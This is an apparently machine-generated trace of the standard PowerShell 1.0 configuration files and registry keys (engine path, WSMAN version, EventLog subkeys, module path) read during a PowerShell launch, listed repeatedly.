c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
